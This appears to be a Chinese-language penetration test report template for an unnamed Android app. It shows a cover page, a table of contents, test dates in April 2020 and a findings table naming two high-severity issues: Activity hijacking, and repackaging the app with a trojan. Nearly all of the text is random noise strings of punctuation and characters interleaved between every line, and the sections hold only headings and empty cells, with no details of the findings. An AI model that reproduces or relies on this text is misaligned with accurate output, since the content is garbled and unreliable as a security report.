7 p. M# U; P# Q9 d9 a. Z. v2 Y, ]7 }$ S2 W
) k* S9 h# H+ p/ N
) I% y H! E4 N0 M
- x# n% b" k. W6 |5 W Q
# n* ]$ F9 ]/ r
7 M& s5 q4 ?& E+ f2 F% o; N1 b6 z( H e" \- s
/ D8 ~+ }9 c! W% F8 e& o. L1 y
* Z, \3 o9 @; y9 E9 w b
0 S$ Y2 T- G& S! q: \, O* D* t
: a- ^+ R# _. B u' G& @/ `; u
文档编号: 7 Y2 C* S- c" V" a& P0 k# {
2 p1 _$ |2 {( h; o8 c8 A2 H5 V
( G4 D j% K; P4 r$ m. ?
9 S6 s7 L% ?; b* P
) j9 Q6 G7 k1 l7 ]0 y6 p! E
. U2 s1 L2 m/ S' }
, x4 z- n2 d8 P1 h1 o
* B: q; k- g/ ~3 B. j
% v* L% U2 }2 M% f0 Z1 i( |: `
. i8 S1 `" h: C* h1 ~5 z# p4 D- k
1 N/ ~5 W# U9 E' h# Y3 y& h+ C6 f# V: x+ o
* b( s% C, [0 q( X9 Q7 [+ a8 Z
7 V7 |8 n: y: L' Q* o8 B3 `+ {* t0 Z
0 ~0 |* J2 ^4 y0 ?, }* H B
7 A: g2 h+ ?$ a. m ) `" \8 a4 X2 U! D* Q) e. b4 x
+ d5 _( m0 }# y8 M
1 w- P$ A M* z* g' b
) F6 Q+ Z' i$ W8 H
: @: {6 [. _5 G3 x
1 v0 x9 z# z) @5 u- J# b4 C 6 o- }, ?4 j! h' O1 y
. A8 I& v! v$ Q0 u4 e+ R6 ~/ k7 O
5 B6 B+ j1 ~" _/ b4 P( r/ V2 w" c
+ p2 _0 o) f2 L7 q" T$ D# g9 x
' N7 E" }/ o! I y- o" ~8 v- ~. V- z
4 v7 x: a$ g7 V1 `' P* {: M# \$ U4 b1 G& n4 b. ^
& a+ ?/ j6 C- b A" L
% H: G% B* n7 c, J' I+ s
( Y7 F* W- i8 }- d7 d' ^6 `* g% \# \2 z
" I6 N& B7 s3 k 7 l$ P+ @3 F: A
3 P4 k- d! F4 |( F* {2 b( x
某某某APP渗透测试
! w* j* v4 E) S0 c) M# F& P. A% E% E& }( r: k$ Z1 o' g$ l
( i, l9 L8 Y8 B7 Y+ b
' C8 ?5 X& q% |* ~ 1 h1 l* Z! G) h% T7 P# l; j+ U7 t
, D+ Y1 d3 r! M% F' F3 }6 K( N
# G+ g8 [7 `) O: G7 T8 f6 ]" |5 o, l+ Y/ T) c* L$ }2 ^! h
% `( p, W" K7 _8 t1 P- z( ^, v$ i& x
1 P% V K' P! ?4 m% }+ W2 Q
' w* n) ^; t6 G& O1 Z * ~. E! r0 q* U$ _" g' _& O4 X" U
# z; a8 t5 f u/ d$ X! q3 {, @( M
: J( S6 T; ]( o: O; P+ y3 K @8 B8 m. h" _% H
5 p- U" {# G( A6 P2 ~5 b0 t! F
% q& s- T' H: Y4 q+ B( I) I) R
7 L# T( L3 M/ ~" ^ p! D4 Y& M/ U* v: V5 c8 Q
# H, r( j5 d; a* W+ @- P5 ^
" o; \0 f+ R5 A
) n- [' |$ S/ i! M- r3 Y
; ~( b% x7 o+ q* E9 ` 3 D8 g7 s6 A4 j
: C: Q- C& X+ u# v+ H4 H9 C& s
8 a6 k5 M8 }8 V1 g( r7 \- t* K/ i: a( f+ U1 }) p* u
% _& v, l1 o, f0 Z, q4 B" d2 e
1 K+ U$ e/ m+ ]8 O( H4 I& B. w, l
技 术 报 告
: D6 x _4 r8 E/ T# M" P' s4 e# \; Y8 b P1 E; |
x# v: {; d1 I) G. n) O U
; H3 D: y" c3 }6 x/ Y5 v3 U; ~
& e+ h$ H# Y2 X' S5 {; O4 b/ F; F+ {7 e, F+ z; ~
; o/ D. I" e. p/ Z, N
0 h' l5 U, ?% l# @- G& b; N
7 @( }# s. ]2 G. O7 R. B: a0 ?0 r) x& l6 z
( J1 T4 f$ \5 M1 M$ K. [3 m$ C) @
& p7 t4 d3 M$ ~+ a9 v: y ( ~6 d0 x5 o Y( Y& K
+ u' f* L+ ?0 |' b7 ]$ [+ f5 b/ |) q5 D
6 w' ]9 V) ~" o
$ `8 f7 v/ K7 M/ E* L
8 `4 v6 J0 d, w
. ~: o: V! k$ h+ E. V- L+ U4 C' I9 c ) e9 H# @3 X, X: v$ A8 o9 ^
9 s* L! z8 { U& M# F+ I; L, I
/ A4 I: S# D! R4 s
2 z. O0 p( B4 X$ [; z
' b! Y/ @4 h% E, t C* u5 t$ q4 n" j0 g
C3 L, ~) ^' V2 s l6 e( [1 v, w0 ^ t
' I7 x( p% `* ], c- U
8 h4 ?! A$ J5 X+ t. c
# Z8 T+ `* f* Q" \) _/ t; I8 J * ^) q c# y X# _, j
9 A( J$ D+ H. d" l/ N" o7 n
' \4 O/ Y. b3 `" a7 h
5 @* b0 T2 d4 ]% D
. d5 A8 Z! g& k) I1 f; O( t3 Q! h0 B
% J0 r3 m4 V" E$ t) y
" {; U G; r6 s' w' Y / ~. w; L; ]8 C& u
: G" ]- d U+ R) r* }6 O
2 F7 Q8 H$ k% C
% M! ^; A0 t! G" i6 F" f 9 e- l9 E. I& O6 I
- e& b+ |" `2 {' i# u+ E8 P : [4 `' E% \+ C. u
5 h7 n' Q& g5 r' G$ `3 }# }
( ?$ Y, X6 z: x/ I& s0 o- S
a2 G: j' u5 a3 X4 H P
5 M: v/ H0 Y' O2 t6 x w O+ Z- B _4 t3 c T& e
/ L( a2 v( n& Z! V3 A9 a8 }
# S* _4 ^9 d6 i8 P$ K8 F3 B* D- x$ `' Y
5 G0 z3 v* \4 l2 Q% U- W( R6 B8 K! E5 `& E, e2 X
3 P$ Z+ }4 I, `0 Z9 Z' i2 Y" [ o
( ]& L+ n8 [, b5 \6 J4 A 5 h9 l0 z/ F& C7 R6 h! `
* J' f' q3 k, c
* t5 J. E8 b+ z! N
i+ B4 n4 H# V! @* V
" U0 q0 m. I6 U8 O6 @1 s# ^
. ]5 k8 @% J/ N ( m6 X: |4 w- e; m
* e8 v. h) O. A9 v# Z+ H0 t
3 G( w9 N7 M1 Z/ x
/ j2 N! j) h8 q
" O3 }2 \. ], Z* Q }& [$ `
- ?$ N7 G3 f5 I " g0 m8 [. W& ?# _3 [* e5 e0 C
) W& p7 d+ `* {7 k
+ W ^+ b5 `$ U2 g! K; _1 I5 g
/ J8 O5 @* O1 X8 M! J - c+ E; R! B# Y* m: ]: B
. p: d7 f2 j4 @# W$ ?% E
- @* Z3 {8 ]- j; Z, {0 ^) i3 I4 W# k) z1 {* a
. p9 s8 x# \- \! X2 L3 Q$ A- Q% p" j( }! J5 Q/ u5 @
2 G* }9 y7 B0 p: q6 F& E. ^ x
+ z+ v! }1 @) X1 e- A' f
0 _- T5 X3 c: p1 m1 q, E+ N) d3 a
/ v0 e/ U* b& y+ y( `/ e. b4 d
; G. I: z! k2 X( C) ^+ L
/ A E2 @ k9 }
/ o3 E3 |! s- m
6 U" X) g; r _& c4 @$ o
9 M4 w/ u. k7 F( l6 S& `; R5 @0 n5 o9 H9 r, t
6 }* K J$ @& ~9 J. e1 H
# g2 r8 x8 y6 m
) t, z1 v% R& [! w4 H! @, K$ m) \2 w: k, }
! ?3 h; i$ h) n, m1 p: [5 ]
+ L, {% ^8 c8 T! }
: D6 ^, f% k8 h+ d b( T3 H7 x
. R7 u U Z9 ]. ]! N& r7 m8 ]/ N- X8 D+ q $ C& _# k5 ~: e* K
8 B1 |" }& C' k2 b, ` 4 i; P8 x& f1 P( {
. |* A9 ~6 t2 n6 m* k0 U: @+ `; i
0 G: r$ Y8 p: q$ f7 j8 V/ M. W* c6 W3 Y
" V& _. H: H1 D
+ y. i% D* e& j1 e4 _+ Y
4 D# V. q; z! ]3 l" v) O/ m& v x7 i% k
" r, {% x% \# @% {: y
. }* e. V& C2 m2 R+ K/ X
; g* J: z }* E5 v q
) {/ N1 d$ b3 h # t3 A6 X9 A" g) Q$ E1 R; ?
, W5 f5 C( r" l$ ? y# T4 d( R
, s7 \( o$ R& y/ O/ S+ f. d' Y/ K- F/ y: K* G
8 ^2 T0 F/ W9 F. m
% u- x+ K$ h' N! W7 T 二〇二〇年 ' ^5 }* D: Y, b; g
$ s3 W, c* @' f5 O
8 ]8 \* U& p; h) Y8 l6 I+ ]3 J$ F6 r0 y: Z
+ |' | K+ F M1 U# `# _8 \$ J$ N k& V6 B/ L8 P/ l; [
$ }, |1 v$ A- y6 n D+ L
) h! o2 ~9 }( O2 h4 j6 Y8 g4 Y3 c
j* r/ d2 ]2 l
. T) R" u- F& b, [9 g
+ S# u* o9 L* e9 ~" v s! j+ Z% K
# {- K7 O! G/ K0 o
/ a, a' O8 V$ e2 W4 ]& P) p( O0 F' C$ t9 z4 u) Z: L% u
. N2 d) w7 G$ |, \/ h- Y5 R. k8 ^; R% N4 h% {% d7 P
7 x; ?& i3 i* a5 R* C
# D8 [; S1 J5 _* X6 U 5 b3 o9 y w, S1 O' k) s9 O
. h+ K2 _9 A$ ~% C$ R% f 5 b! Q% D. l: A# Y0 D4 o8 ~. D
: e- c3 s2 l' R3 P: v" _ 目 录 1 T$ y$ I4 K, C% o
9 @4 ?2 V9 ^( T
* G$ {; Y" ] e2 y6 m# X$ O: M3 Y- m/ o4 a# t8 ?0 B `
% I% w; f/ |$ v! Y" Q& s9 V% |! y- V( T7 |. k' j$ p& V2 D
; \4 S2 B$ K2 J) F: ^8 p4 a, [& ~+ z8 t _3 }
4 u5 y: j, C6 P4 o! j! R! o% B/ h$ ]1 O
) ^3 b8 }& X# B: V% c8 s4 G
$ y0 M# c2 z }( O
1 H# a" v9 {9 ^% `. W
+ }% @6 O. ?1 S4 q. V$ }( k& H4 t7 T8 i$ N0 l' I k) t7 U5 N9 Q
1 概述... 3
- K& Y- h R) s; a6 p" b* M; R$ p3 H) ~/ P# w1 p/ \/ r9 V) W; Y( x6 F
$ x7 a/ _( g( T1 f
6 g1 G2 p, q5 y5 K
( ]; M; X8 n3 ]; s8 h" N; q
5 C) u& ]) {4 J7 j* h 1.2测试时间... 3
* B6 P- x; z n
8 C+ S7 \/ ?& Y% B( J
, j2 Z" D& V5 L% \+ D/ [5 I" L* ]# T9 E" P8 q
4 E! y. A2 ~: z4 f. o z: v
: M' Z x" a. d: b+ o4 ]# s1 i
1.3测试对象... 3
, P/ T8 p- G: U. ^7 V* Y1 Z4 n; t3 `0 z5 c, ~- B
1 G+ K* i+ v2 D7 _
5 k- ?; r6 l6 J" \/ i
7 j2 J3 G9 T) n4 U! f! F! E5 Q% d3 Y, m2 y) C+ V7 E6 Z! G' o
1.4测试结果... 3
2 Q7 S- v3 a9 s+ f) M" I
& |& ?0 ]1 x7 X
7 G9 d# ?. F! P+ p# R
: W3 [/ N2 w* B5 |; f; H
7 }, B6 u) n8 ^3 k
( x$ e! X7 s, T/ _4 r
2 检测结果... 4
. H- {. l- _ q: w# K# p" P) P9 v
& S6 J, P+ \# U9 x+ l: X* W }4 }
& p+ q" y/ m6 D4 Q
3 [* @( W: a. S9 b
2 `5 X# }3 N, t6 t- F
3 b6 r2 a# ^: p 2.1 某某某... 4
: L' h, g8 }# B: m) t! X- P* ^& i1 I9 Y& m
7 ?6 V* ~# T* z; V! w0 X+ m: F4 V
( Q0 `* a( |& U, p5 W
1 c9 M( Y3 ^/ \/ W7 d# n2 b
) S2 @& c5 ?; D- t+ ]- ` 2.1.1检测目标... 4
+ ?! b% j$ g) R/ p; k# J& h2 K" i, }
) r5 s v9 e% h
' E3 |7 o( v! x& d( n/ @7 y$ ~" ~; j" e3 \5 B
0 n' Q# E) X. F! R I- n
+ Y9 @; l6 |! G5 ?8 E6 e- e
2.1.2检测结果... 4 X4 e. e6 z+ @
* w* |# C. O0 P' U# C6 Q$ k/ P
- t* W: Y+ M- P- G! w! }" G
! x9 j3 J- G- [2 f( { . x1 N: [, P |7 n5 f; H V
! H: ]/ y x; T0 d
2.1.2.1. 4 7 o% q# `5 l3 P% X+ G
- \8 s+ }9 G j7 X' r: [
, z! I7 |' \0 p) r
% J7 g& x7 T* V) f# S: [1 ]- u* _
( m9 Q, t Y& c q/ t3 G/ |- V$ N1 h" K
2.1.2.2. 6 ( \2 U0 A, v8 v: V; R
% r! b( T5 @+ o" r0 d9 X8 E* b
% Z0 l# `& Z9 D/ k" Q
1 C, ], o& R6 _% i
t3 W% I6 E6 c- h3 h6 a' U& ~5 u7 w* }
. y) g" b) J9 Q
, O$ p" \8 l) f$ ]$ j: |, j, K
# n! I! F8 U2 F0 }8 @" W5 m2 Z6 I# {: A
; d. g$ N: t- E* @; A% F F. J, t+ J: {$ K+ |- ~) H8 n
' r: `0 B) w9 m8 R
! _% e3 t9 r# h& C, ~2 S
$ ^6 `, L H: Y9 W% ^; F+ b D
, X$ o% b. ]& I$ U: _" J- C5 b
% i: ?* c+ D- q' \" N% @# ]) k" A5 t
% l' Y; `2 [& X7 m, P/ Q9 o# \- C/ J2 \0 S' ?+ V/ d" N
1 概述
" b* H+ _8 D% e% c Z2 U! | }5 u7 G6 q
4 ^( u5 H" w7 M! f' R5 y1 Z9 h3 g/ z; t
Y; n; l& y2 n0 J( y8 \0 z
' k2 E( X7 F' D3 `
1.2测试时间
e! n- i" E5 a2 c4 e+ L: `( _
' [$ Z4 P! ], F% k) v
) ? T: S6 }- B4 f0 D) N6 M0 c9 z2 M+ S% B# D& b2 R0 d; b l
. S y' G" S7 H$ T
% S2 W8 N8 M& D( ^. f1 ^
& W4 j0 H. W# t
; N/ V( \$ ?+ c( ?% V# C5 O
. `0 X! u e4 m- ^5 O
M8 N- G, f# k | |
9 E& R; g0 s: ^5 L1 w- s' W$ s& i+ Q/ u9 W" }
2 l& h1 U6 W) V5 D- A' N) j0 s) W
" [% o. W- B& {6 X B; h: d
渗透测试时间 ' w& ?- u* g" s1 W5 ?& q; w
4 @8 j" g H0 B( E
' V1 v" r$ u( W8 {
- \5 P. @5 y6 ?0 q( q0 z | / Z i3 i6 M- o! w3 w( v* J" m
9 v }" X" Q9 G4 y7 V% K0 @8 E
7 v' Z8 {# x1 O2 ?" T
/ L4 o" ^- Q/ e& f
$ g1 T5 n' A B6 | ?7 b: R
5 d- B) i+ Z ]4 }+ C% v) J& x: K4 N
|
3 j8 B2 _9 C- c: Q
, h* ^2 s. s! a5 n, P, i2 N 8 z$ S( W( C5 ~" g
" d# F0 N$ ^" x$ n) p8 F
起始时间
: ]' A/ q/ T9 p0 _7 N5 @) `! X; X4 j
5 M: q' e) `6 s& P
% B' N* u+ R7 M3 C Y6 H+ a |
% [1 n* U0 c% F- h) M T
! `* k P3 k" r6 u( o ! j5 C; p) Q* E/ e
1 N. I1 Z8 Z! ]- x& c3 c+ x, x
: N" I9 \ R! {
. }' z7 j) Y k+ n& ` 2020年4月6日 + s* N' H$ E6 Y E/ M# [+ O9 T
5 l7 l( n7 v7 q6 \' s \( n7 L% m, p; Y! t7 r
9 k; D0 _5 I$ }0 Q6 c. F/ M- j/ I
| 1 S! V+ v# G; I$ [. j
) `0 d% t7 B/ ^/ I3 Y- l" E
; D* f* n; h7 {6 l2 Z
J$ V- `# M. Y: h
N/ ` ?) B4 s; H" J: J8 f1 {1 \
- b6 ]. c; I! v# }
|
2 w4 I$ J, e' ]$ Q2 C3 N0 l
3 M; {0 O; ~/ k. ~; f
3 B. ~8 y6 b% m1 p- E9 y" [2 H( a1 X8 u$ o
结束时间
% E0 H( `! u4 g7 y! t6 J
4 S5 z: k" `! W + R2 z6 J3 u$ J# y
5 O N8 D+ E, V0 `; G3 _& c
| " p3 y8 K5 T3 u+ c: E
6 r# O6 E: ?8 L/ H ] & a0 K1 k1 P; U
/ `( t% w. x$ Q
7 N" n3 Y" y+ D+ U* n& R
' s. H( {) h* L; `7 E 2020年4月9日
5 _& T; ^) W. T* T
1 W9 g( Q$ N: I0 l8 P. E0 U2 h
3 q; C+ W. R4 I I
6 L: L- z- ]7 n& ~ | ; P7 c/ Y7 }/ m! V2 H: @3 `
/ l1 Y: E* C8 F. b+ m) q2 v
+ Y7 }' C/ ?5 p0 |$ x5 z- o6 \& y& K- p h h1 W; a* k
S% P# {" i/ o1 I) S7 q4 D5 t0 q' d
* ^5 b5 `8 W! W4 D V: D
; w: l7 ~6 w4 S' u P, q; l+ D3 h: Q8 }4 v! l, I c0 }+ Y
, x' [8 D! k# U' D8 @
; T% F z% }8 b2 I- d2 x) r8 n7 B 1.3测试对象
& l- c. \$ L2 `1 ~$ H9 \) h6 d& C! y( c
! ^- I8 U! ?. R [# Q1 t M
& d6 n2 v/ H. k* a: A/ z
& |+ j7 \8 d( ^' U c% \' p" p5 c, h; H1 E
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ' L+ h9 r) i- D3 E
6 K5 @0 W$ J7 ]8 @
# w! F9 {: S$ b/ [
) [1 @ y" ]' }5 D
9 V" H9 ]& @2 m2 W/ A. p" y- |$ h
4 ~/ t2 w# C- Z U; X
表1-1 检测对象 5 \+ n: G) U. E( F
7 y. V. `- `, i6 J4 B
& Z O O% p7 F4 i# m& H" A
7 W9 \4 l0 E( @' E k# g ! S+ I( H; F* ~- \1 ~ x6 S
1 w- E) J9 u& s2 J, Y" S% X
# `" J% ?5 n/ ]7 b: G
3 [' n6 V: F; j# _& k+ S" \ 7 L" E( {# M$ o4 J( Q
) y- Y* b- d! q* ~& r4 q | 0 I- w$ x8 S, I0 v
! w+ _) d) M( P( P$ H7 C- V
0 R2 v6 P( u- c1 w; A$ `! p, ?: @7 {9 G( l, j( t, @' ]* n3 J/ f6 r
序号 2 O7 n8 ?7 v# S
1 f t( N" N+ K t6 A5 r% d
2 w6 p1 v5 R, `0 r1 e) p3 X
, \7 N# P# C# R# r$ r$ \ | & y; ^; s% n* A- P9 I2 b" ~/ A
) s. U5 S% ]7 z, K
7 E# ?: ?6 h: `6 h' q: T" i3 w; ]: ]5 V" u# Q# B
% r3 _; ?( Z; p# V2 _7 _0 u) O
* [$ {+ L+ v$ z0 ~6 Y 测试对象
~/ t% i1 V; U% s' |7 D1 r
; |) g s }, R/ q! L6 H : a W# w! E2 F% p3 X+ S
* I) t5 P. C& u! I; O |
* ~' B# c6 I/ m" \/ s( n' Z8 l x' {' G
/ s6 I: Y2 ^! a1 ], y
, @) W* Z" V0 F* z8 v/ Z; E Z
8 C3 Z) R$ o0 {. K8 ]
* _" `$ \2 q/ T1 x4 m8 Q' x
测试地址 2 K7 L: f) m q, x
, z% _ R+ i/ U0 E6 j ( r2 R* t; l5 W7 j- T$ {" P; Z
. v' ^3 l; z; ~4 m$ _
| , `1 [) @. c9 j4 _0 E
3 @# h+ ]" O3 e
$ q! {7 m' `3 G1 @: C1 S+ d4 j# i: u5 y! @# |0 {" z9 r
7 \. \( X* p+ y& X4 L8 b4 K
7 D2 T6 z2 G& K; O) { 安全漏洞
( ]7 \- G( @# H& S3 P0 e9 l" L& ^8 y3 i9 a% Y
! ?! h W. M' P, P2 E5 M: S9 {
6 o5 i( i$ [# C. [ |
$ n2 R) W' h9 u' L3 L% P# O! _! `- y; s( f
: I% [- n6 y; k- e
, Q3 n( ~2 P: |
1 T% F+ [" J3 B- u( w/ r
' D: m1 j7 P; e/ l | , L+ W3 v. @: A: C# @
% s; y1 [1 D/ k8 _3 J) j
2 j, M* M u9 g: r9 l* G, c& i5 U# _2 z. s0 m" |& M, j. o
1
4 c+ q$ Y% Q' L$ \% z
7 x5 G/ a5 z4 w3 R0 A
9 |+ n$ J2 H. k' S7 p) b1 i
$ |" Z$ V3 K, T2 L. } | 2 d) `# O0 A5 {% @. `2 m+ u) c) ^
8 v b* v* _4 X/ m1 f7 L% t* @
4 k+ `0 o4 t% D
+ o! J% q+ K$ U
* V4 P7 ]9 y( S1 y2 x0 J1 X( ]5 ] | m( Q& L
某某某安卓APP * M M$ Y; b: z) G
) D$ L* I2 T7 y! {2 I) S* U
+ q P+ U2 m, _' y& b! L! F7 w* q& v( ]0 y' A7 _
| 2 v3 w+ @ K$ c$ [9 p
, K$ A8 o" e N& C( V0 I6 x- Y3 n# {/ l
1 _4 l4 ^: A4 r$ a& e) X; S: S, Z( w% b6 B5 F
" T' B5 }( C( N2 n+ B( _
4 J4 @0 \2 N+ w" K6 ~$ [
s' ]: U- P! p1 N# e: ~" ~" l9 ^6 Q$ T' F$ o9 S( \
7 g/ n" D h" G
" \6 M0 e8 a7 f8 T# m |
( B5 c- L$ V: g! @3 S/ k @0 m" q# f- L# `# B
' y$ \& _0 a. ^- `- T4 Q# E) L) c$ @% c
5 k& T* O9 W3 T7 ^
) d' O! ~. O( y" }. _ 2
8 ]; p. |& H, X# z! s* N% s, Y' z0 Q+ o6 m( l0 E5 g L7 w! G
! m/ f3 c" Q- g& _& \
7 t* [" ?" Q$ {: L5 f* k& y7 v |
+ r: D* P) q; y4 b9 c, @; m: z- [3 m/ W) v. E) x1 ?; H. s) ?
0 R/ u9 \+ c9 k' V* h. E
# Q" t# ?. n3 D. u. |+ M b7 Z; f2 @. g3 T) q5 A Q1 b
( l# c0 c; Z7 x6 k) f* S1 u
; ?& y) _. Y4 A( E/ G
* v; w+ h- X( L& P W7 F 7 _0 d+ c! D5 l( [1 X
% }4 } z1 y: e 1.4测试结果 3 o4 d5 v* y! _
( R2 U1 x1 R# E& g B; ~' Q
3 q; A3 T: D% J6 M; H* k. \
0 u ~& P/ V1 \; x! w8 k $ @! Z- r" V) F8 H/ _) t9 n
1 q& J W. w( i: n3 J( Q8 N5 c 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
/ B) n& e8 ~! H0 @4 l
" q2 g$ ]* L# a
l9 O9 Y* J0 P6 M+ Z
H8 p* f6 l( r # W6 y- i* Q- v3 k
6 D; H; i; H1 k $ n) P- x P' i" F. x j# L
8 o V$ k6 u$ O1 v! v- O+ e
4 |, {5 Z6 e7 {' w3 D
& b* ^8 M/ ^! \) `: v
1 n, x" C) t+ l' x" T: Z
( g' Q% b* f2 G2 U" x! q0 ]- e 9 V0 S6 g3 s0 r' J
" n. n9 H$ |! A8 W
% `% K9 C+ T% {0 O- \$ a& j0 A2 ?
% L4 o3 T0 [! R$ Y
0 I, |: p7 g& d$ v( ]7 v6 k6 w! D m, ] M1 Y5 Y
| 5 f( D* u! R2 W- j% Y
5 l, \, ]" t% {' k2 I+ k . s" X0 v7 j2 q; `. M
0 m* [' _* ^6 L* s F5 w) y% F4 W+ l( ? 序号 3 s/ q: c: z6 Z8 z/ f1 q
3 c1 c. _; W, Q6 ?0 `0 [
$ j1 l0 s5 A2 d1 C5 \
- ]( H( Z+ ~+ V, ~
|
! A" U4 j; R! _( j
7 Y5 Z, ?5 K+ g6 ?1 I $ J: n5 ?9 O/ O2 b V: B% R
9 z4 r4 g$ g8 n
4 U# F6 d7 K0 j4 V9 @4 J- G3 b" ^2 B
系统名称
/ x) K y! L, y1 b0 n8 i7 r; I5 ^9 ?0 V J# w. B O# n
2 R2 L2 B, M( u4 h: W
1 c- b: |$ T* Z, R" a6 k- t# }- f
| - c2 Q' z7 [; w/ d# J
. |1 c8 f2 [' P
7 K% r$ L9 p. T1 y2 q% r/ b( l6 L$ a. D, q7 }' }9 ~ p
% ~) E0 k8 C! ^ M c6 Q6 t. l6 L- |! F- ^% z( K2 C d. w7 J
漏洞名称
+ D: C/ X+ W: ^
# e* s) B2 l; b6 i 3 @9 `. f3 j2 R# ^! I" O# S6 l
& H# N! ?! P0 X. Z! |0 G) r5 h3 o) w
| , H6 c/ B" S" W8 i3 V
: Q, b( z8 u/ E! q
0 A* k0 v7 K# w% u
6 o9 ~. X% r1 _7 F - p, n- V, ^. k" f- L
: i, c4 T) O+ J6 p' F, F+ f' J% T
漏洞危害 - k0 P5 o% e' l
6 e4 x+ X! W7 ~& X; `
; G, [0 \. o9 n+ o1 C9 y+ d& I
* X7 d% C; |" V# i/ y" v% K | 9 E" R, ?# E" B# t0 m. J0 a5 O
7 o% W) N$ S- \& B& l$ D5 _) c$ J & h* \( y1 a+ q
& _3 |4 d+ K# D3 p; | t& u0 j7 F
- e, U0 p* y6 l8 f
! z2 g# J2 s7 i q) e' _. T0 J% u 修复结果
9 f3 X9 U. ^, ?+ L/ u
9 X- N0 k7 G ?1 F# e5 O* ~ % J- \# a& H; Q6 s' D' i
- Q' A7 E1 p0 b( p; C4 { | # p1 I: `7 ~1 a$ e# D
6 P# A) g8 j7 Y$ G3 U
, q: @5 x' |3 I* f
6 |& f1 ^8 m: [( ^% j0 k9 o8 w 3 E9 k# w/ g L. ?
: \) a$ f- f s( g
| 9 q% P; Z8 e; w0 ?" F; N
8 z) W: U( f; I% k3 ^
- G7 E: J2 [$ g* U. G8 ^: D" |# [- A! | S5 ?$ q! T
1
# j$ i4 q: U9 C$ T1 T) T f0 q8 `7 v4 p- c# Z8 ^ `' V5 O2 R
+ z* r' F/ D5 p% n* {+ s- K. r8 `$ A
| ) W2 {% v. _7 _& d
6 E% A# X5 `9 w$ R& _+ [ 7 Q9 S) h/ M" E! x4 Y( \+ l2 _$ f$ Z
( @) Q R& M8 t$ ]: s; ^
. F+ e+ i& ]- f1 a- y; O5 D6 i2 T' e' l# c0 e
某某某某某某APP
; Z f8 i/ f$ G8 l1 F0 T8 j5 ?' g7 U4 Z9 T2 L9 l; j5 r, D
- p: s# I3 U3 F0 _5 x) `! R
( I- Q) C. v H6 B7 Q& Q |
: O7 F! U" Y5 L2 J# R4 b' r8 S e4 a+ b! t( y
: Y! G! I5 M; a7 F w0 V
) I, f+ \7 S. p3 }
2 k$ E; l$ a8 y- N. q5 H: S. ~
. j& b; u: ?" N7 Z+ y+ w0 S, \2 ~& d Activity 劫持 7 l" v6 h" ~8 Q" _
" r+ H% P* @5 `, o3 B% g: H
7 O; {0 B( g. R {" V
4 e, v! K3 I9 C; @3 O/ o. G 6 ^3 W( L @$ U( J' F
& o1 {, |( F% d" p T$ ]
/ K9 K* b+ W6 \
4 e5 R6 |5 g7 Q8 Y: z9 n 6 F3 v7 h8 b+ m- y( ], G+ G# s
1 f) i9 l- u" O- p/ ?" k) [7 S# | |
2 I% C& _$ h- @3 r6 F# ]+ e) f- F. V' j
; C: S- h y8 x1 t3 c. f
" M5 X2 L" [% e6 `
# u# |: M9 h' }! i2 @) ^! X
6 A0 u$ }0 T' q% l 高
0 O# |4 H# ^% Q. f3 y0 n
/ ?. o3 ~* Z$ m7 S1 L ; g2 _7 R1 Z$ U5 g- {. C
! y: {, d | s4 p1 Y |
% Y3 }6 U( [8 z3 H
; K3 n# r3 R* q# f8 h! D( `5 x* f 7 a" j) e$ B; ]& c5 H
1 ~% @$ L# V, c. V. i
0 x0 A2 O$ S; R
1 B/ u: B4 O$ X6 U M* B+ ` ^, n
: m" e# u& ]8 _; }* K
+ H1 W: H* z& O: S( k- V7 N0 @# I# E$ d1 H# V; R$ Y
|
2 n: e! w+ f+ K/ c/ e
" u# H7 g( @' t; e& g5 @
) Z/ C/ f, f3 I) ~4 M0 d5 {) h' U1 @9 R( Y7 f7 Y
z# h8 j1 Q2 @( x
, ?7 G' G/ N! ?; k. J
| 0 u% w0 v/ G/ ^% X3 h$ |# T+ L
& d" a. t( o/ L# R6 x
- d0 h7 r% o3 q" Y3 t. W
R2 g* f% m6 X7 e3 R& L1 t0 I
2
1 p |, Q: d8 J* C- K! _- D
* b3 {$ t$ ~( y0 ~
" v7 A& A0 R+ j; K* z& }) n# j
3 e8 E$ [# C& E/ F; J |
7 Z9 ~% L9 H0 r+ h4 I, M
" M8 v$ y8 {7 O8 w/ r" B" `
J9 y( R0 k h' c# r
$ f, W9 d: o7 E" X . w9 A) N8 N9 B9 C
, i, ]& G9 f% h9 o& w3 @
某某某某某某APP
0 l! _4 n+ G8 y! t* L
7 }5 B1 `+ r/ v8 L( J% ^ # G( F/ O. |" H; J
1 o) L, {: D0 w7 K' g. U | % g' z: A4 I9 A+ p" `4 v
1 k4 D) R1 I& \9 o0 O# m) y0 P
# y) g$ Y* e9 t: E3 K+ H' Z- o z
5 M+ Z3 i& n/ n) y% J - ~. A U* I7 w
0 i9 G) H/ d+ _' _3 @& s
反编译二次打包捆绑木马、篡改APP代码 1 n+ c6 k" Q" j6 f* T, R! Z
. F; w" N; n% h+ y( o: Y: m
) R$ C+ M* Z4 @" C; j# V4 E& X. A' u& B" \% }5 b. w
| ) \4 i! P& N/ k( x
6 _, J" p7 ?, r0 `; g# o
9 S+ h# K$ Y8 D% q Q* Q
. D V$ }( w( N$ y$ b, C Z9 F* t# I
+ W) `. b2 S6 {9 N8 j
- Q8 N2 f7 ^7 M 高 % Q9 C! A' g! Q* d
# a1 H i0 k3 @) ^4 r' W6 h
2 ^# o$ u% V( H" ^. R5 ~" X
3 Y$ d9 }1 V% M, s |
% I4 Z3 `7 y. b0 i4 `9 m
0 p9 X; x, J( N$ S. v$ m- k! V' a ' [4 t9 t: d1 u
6 ~ k0 @+ r: Q2 q9 |+ q 7 t! ?" Z% T0 O+ @3 X( V" O
3 F, h5 p( u% I0 x+ z
2 f- N+ f3 U/ w; y; `, M) P& ^
S: {+ I" j4 j# n 0 n2 r% L# O G
; X0 X% Z$ t8 T9 Q9 Z, |3 K4 v | , Y7 u. B! | d) d
3 s+ u+ [1 U# {& o7 P I% t& d5 `
7 K! G( m9 A! ~+ r1 C; f" l
0 r) B) B: L3 i( T% O) Q+ T
: Z6 G- g5 M- S! h, _' u" o* N( R& f% c: H
8 F6 K _5 s6 R+ o5 F. W0 ]/ \6 ]; s+ f, r" L' L5 k, \% V
8 o6 e& V1 g2 i2 s) K4 H8 f% M" ]5 b6 A4 j( P- e: h7 y
' c, \$ f. p _1 K# n
3 y7 ?" |( e, b
8 |. E) G5 \ z/ q# d
$ l: q. E9 f* k6 y& u
